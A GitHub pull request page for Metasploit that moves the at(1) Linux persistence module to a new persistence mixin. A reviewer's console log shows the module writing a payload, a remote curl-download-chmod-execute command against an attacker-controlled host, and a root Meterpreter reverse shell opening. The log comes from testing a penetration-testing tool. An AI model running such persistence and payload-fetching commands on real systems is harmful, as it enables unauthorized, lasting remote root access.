Modern persistence: at #20526
Merged
Modern persistence: at #20526
+302
−104
Conversation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
msutovsky-r7
force-pushed
the
modern_persistence_at
branch
from
9730c75 to
5abe0f5
Compare
msutovsky-r7
approved these changes
Sep 12, 2025
There was a problem hiding this comment.
msf exploit(multi/persistence/at) > set session 1
session => 1
msf exploit(multi/persistence/at) > check
[*] The target is not exploitable. does not exist
msf exploit(multi/persistence/at) > set WritableDir /tmp
WritableDir => /tmp
msf exploit(multi/persistence/at) > check
[+] The target is vulnerable. at(1) confirmed to be usable as a persistence mechanism
msf exploit(multi/persistence/at) > run verbose=true
[*] Command to run on remote host: curl -so ./KAuOUlHauQ http://192.168.3.7:8080/xjLe7cHOrd0bJcg1JEoaHQ;chmod +x ./KAuOUlHauQ;./KAuOUlHauQ&
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf exploit(multi/persistence/at) >
[*] Fetch handler listening on 192.168.3.7:8080
[*] HTTP server started
[*] Adding resource /xjLe7cHOrd0bJcg1JEoaHQ
[*] Started reverse TCP handler on 192.168.3.7:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. at(1) confirmed to be usable as a persistence mechanism
[*] Writing payload to /tmp/c91hblhURr
[*] Writing '/tmp/c91hblhURr' (104 bytes) ...
[*] Client 10.5.132.164 requested /xjLe7cHOrd0bJcg1JEoaHQ
[*] Sending payload to 10.5.132.164 (curl/7.81.0)
[+] at job created with id: commands
[*] Waiting up to sec for execution
[*] Meterpreter-compatible Cleanup RC file: /home/ms/.msf4/logs/persistence/10.5.132.164_20250912.1654/10.5.132.164_20250912.1654.rc
[*] Meterpreter session 2 opened (192.168.3.7:4444 -> 10.5.132.164:57680) at 2025-09-12 14:17:01 +0200
msf exploit(multi/persistence/at) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/linux root @ 10.5.132.164 192.168.3.7:4242 -> 10.5.132.
164:45880 (10.5.132.164)
2 meterpreter x64/linux root @ 10.5.132.164 192.168.3.7:4444 -> 10.5.132.
164:57680 (10.5.132.164)
msf exploit(multi/persistence/at) > sessions 2
[*] Starting interaction with 2...
meterpreter > getuid
Server username: root
Release NotesThis moves the |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Updates
at_persistenceto the new persistence mixin. Part of #20374Verification
msfconsolessh_loginfor instance)use exploit/multi/persistence/atset SESSION <id>exploit